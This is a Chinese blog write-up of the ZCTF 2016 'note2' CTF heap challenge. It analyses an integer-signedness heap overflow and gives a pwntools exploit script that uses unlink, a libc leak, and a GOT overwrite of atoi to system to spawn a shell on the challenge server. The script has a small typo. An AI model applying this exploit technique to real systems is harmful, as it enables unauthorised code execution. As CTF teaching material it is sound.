[Buuoj]zctf2016_note2

最新推荐文章于 2022-08-13 22:04:25 发布
最新推荐文章于 2022-08-13 22:04:25 发布
阅读量310 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zylxixixi/article/details/120708130
版权

首先对程序进行分析,是一个常见的菜单题,提供了增加、输出、编辑以及删除的操作。

 其中看两个比较重要的功能,增加和编辑。

根据用户需要建立相应大小的堆块,并输入相应的内容。其中申请的大小不能超过0x80。堆块的大小会存储在一个表中。

编辑功能中提供了覆写堆块和向堆块增添内容的功能。

漏洞分析

这里函数中的i为unsigned类型,a2传入的为int64,如果a2为0,则可以绕过输入大小的限制,造成堆溢出。最开始并没有发现,后面经过看了一些师傅的博客,发现了这个漏洞。

利用思路:

因为这里有一个表存储申请堆的地址,所以我们可以考虑使用unlink。使用unlink泄露出libc,后面将atoi的got表地址修改为system的地址,输入'/bin/sh\x00',即可以得到shell。

正常chunk大小fake chunk
chunk00x900xa0
chunk10x20
chunk20x90

                                    

payload:

from pwn import *
from LibcSearcher import *
def login(name,address):
    sh.sendlineafter('name:\n',name)
    sh.sendlineafter('address:\n',address)

def add(size,content):
    sh.sendlineafter('option--->>\n','1')
    sh.sendlineafter('(less than 128)\n',str(size))
    sh.sendafter('content:\n',content+'\n')

def edit(idx,option,content):
    sh.sendlineafter('option--->>\n','3')
    sh.sendlineafter('note:\n',str(idx))
    sh.sendlineafter('append]\n',str(option))
    sh.(endlineafter('TheNewContents:',content)

def show(idx):
    sh.sendlineafter('option--->>\n','2')
    sh.sendlineafter('note:\n',str(idx))

def delete(idx):
    sh.sendlineafter('option--->>\n','4')
    sh.sendlineafter('note:\n',str(idx))

context(os='linux',arch='amd64',log_level='DEBUG')
#sh = process('./note2')
sh = remote('node4.buuoj.cn',25852)
elf = ELF('./note2')
puts_got = elf.got['atoi']
login('aaaa','bbbb')
heap = 0x0000000000602120
fake_chunk = p64(0)+p64(0xa1)+p64(heap-0x18)+p64(heap-0x10)
add(0x80,fake_chunk)#0
add(0,'aa')#1
add(0x80,'bb')#2
delete(1)
add(0,p64(0)*2+p64(0xa0)+p64(0x90))
delete(2)
edit(0,1,'a'*0x18+p64(puts_got))
show(0)
leak_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc = LibcSearcher('atoi',leak_addr)
libc_base = leak_addr - libc.dump('atoi')
system_addr = libc_base + libc.dump('system')
edit(0,1,p64(system_addr))
sh.sendlineafter('option--->>\n','/bin/sh\x00')
sh.interactive()

yj@pwn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
zctf2016_note2
seaaseesa的博客
04-17 773
zctf2016_note2 首先,检查一下程序的保护机制 然后用IDA分析一下,在edit函数里存在一个溢出漏洞,我们只需要让v6-strlen(&dest) == 0,即可绕过’\0’的截断,实现溢出。因此我们只需add(0,’’),即可利用这个chunk来溢出,由于PIE也没开启并且堆指针保存在bss段,因此做unsorted bin unlink比较简单。 需要...
zctf_2016_note2
xieyichensss的博客
07-03 144
这是一道unlink的题,非常经典。 unlink是什么,顾名思义,就是把其中一个chunk块给free掉。会将堆块的地址变成存放堆块地址的地址附近。 看图 需要绕过的检查: 1.后一个堆快的prev_size为要为unlink堆块的大小。并且pre_inuse要为0,只有这样,prev_size才有效。 2.需要构造fake_fd,fake_bk。 (这里不考虑large_bin的检测) fd_nextsize和bk_nextsize 思路 1.首先一定要泄露libc基址,这样才能向下进行攻击。那么,如
2016 ZCTF——note2
04-20 343
64位程序,没开PIE  #unlink 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stderr, 0LL, 2...
[BUUCTF]zctf2016_note2
zyxx_wjc的博客
08-13 1108
BUUCTF刷题wp分享:zctf2016_note2
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 573
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
[BUUCTF]PWN——zctf2016_note2(unlink)
mcmuyanga的博客
02-07 745
zctf2016_note2 附件 步骤 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入,方便看程序,我修改了函数名 New_note() 定义的时候i是unsigned_int64,但是for循环里的i是int64.我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,存在整数溢出漏洞 show_not
2016 ZCTF note2
Morphy_Amo的博客
01-27 2591
堆溢出中unlink的应用
unlink 2016 zctf note2
qq_36918532的博客
01-18 131
题目可在buuctf下载 这章还是unlink的复习 拖到IDA里面可以看到,开头让输入名字,地址(其实没卵用) 然后看下面的菜单分别是新增,打印,编辑,释放 在新增功能中size是无符号数,所以当size为0的时候,0-1之后为无穷大的数,也就是能向堆中写入无穷大的数0xffff…,根据glibc规定会分配0X20个字节,但是读取的时候不受限制,会产生堆溢出 并且最多四个堆块 同时我们可以看出ptr是存放content的地址(0x602120),id存放在0x602160,size存放在0x602140
【unlink】 zctf2016_note2
huzai9527的博客
04-19 222
【unlink】 zctf2016_note2 1.ida分析 堆溢出,unsigned int用于判断条件,导致的堆溢出 指针数组 2.思路 创建3个chunk,chunk0、chunk1、chunk2,通过chunk1连接chunk0,chunk2。构造unlink 在chunk0,构造fake chunk,free(chunk1)然后再申请修改chunk2的size,add(0,'b'*0x10 + p64(0xa0)+p64(0x90)) 释放chunk2,unlin
Unlink——2016 ZCTF note2解析
weixin_30256505的博客
12-14 195
简介 Unlink是经典的堆漏洞,刚看到这个漏洞不知道如何实现任意代码执行,所以找了一个CTF题,发现还有一些细节的地方没有讲的很清楚,题目在这里。自己也动手写一遍,体验一下 题目描述 首先,我们先分析一下程序,在checksec中检查文件,发现是64位程序,然后放入IDA中,f5,,得出主程序是这样: void __fastcall main(__int64 a1, c...
2016 ZCTF note2 题解
coco的博客
12-01 821
程序分析 先查看程序开启的保护,可以看到没有开启PIE。并且也是一个经典的菜单程序。 new note函数 可以看到,我们一共能申请四个堆块,堆块的指针,数量都存储在bss端上。我们能申请超过0x80的堆块,并在其中写入内容,这里的大小被限制了。但是我们进入my_read函数后就能发现for循环的条件中,size为int类型,而i是unsigned int类型。我们都知道,在c语言中,无符号变...
buuctf GUESS,ZCTF note2学习
weixin_46521144的博客
07-09 232
GUESS 知识点 stack smash\environ泄露栈地址 题解 这道题是一道栈题,好久没见栈题。 可以看到程序会把flag读入内存,之后fork子进程让你猜。这里需要事先了解fork工作方式:把父进程虚拟内存空间完全复制一份(具体来说,私有写时复制)这说明子进程会复制flag,以及栈上所有内容。利用这一点以及题目给我们的三次机会,结合canary smash原理解题。 stack smash之后会输出一串字符串,其地址是environ[0]。基本思路是通过gets()栈溢出,修改environ[
ZCTF - 2016 - Reverse100
风靡义磊的博客
07-21 1768
ZCTF2016的第一道逆向
scratch2源码滚动的天空
05-30
scratch2源码滚动的天空提取方式是百度网盘分享地址
【扩频通信】 QPSK和DSSS扩频通信(先扩频 后调制 误码率对比)【含Matlab源码 4549期】.zip
05-30
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
grpcio-1.38.1-cp38-cp38-manylinux2014_x86_64.whl
05-30
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
【信道估计】 CLEAN算法超宽带信道估计【含Matlab源码 4591期】.zip
最新发布
05-30
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
grpcio-1.36.0-cp36-cp36m-manylinux2014_i686.whl
05-30
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值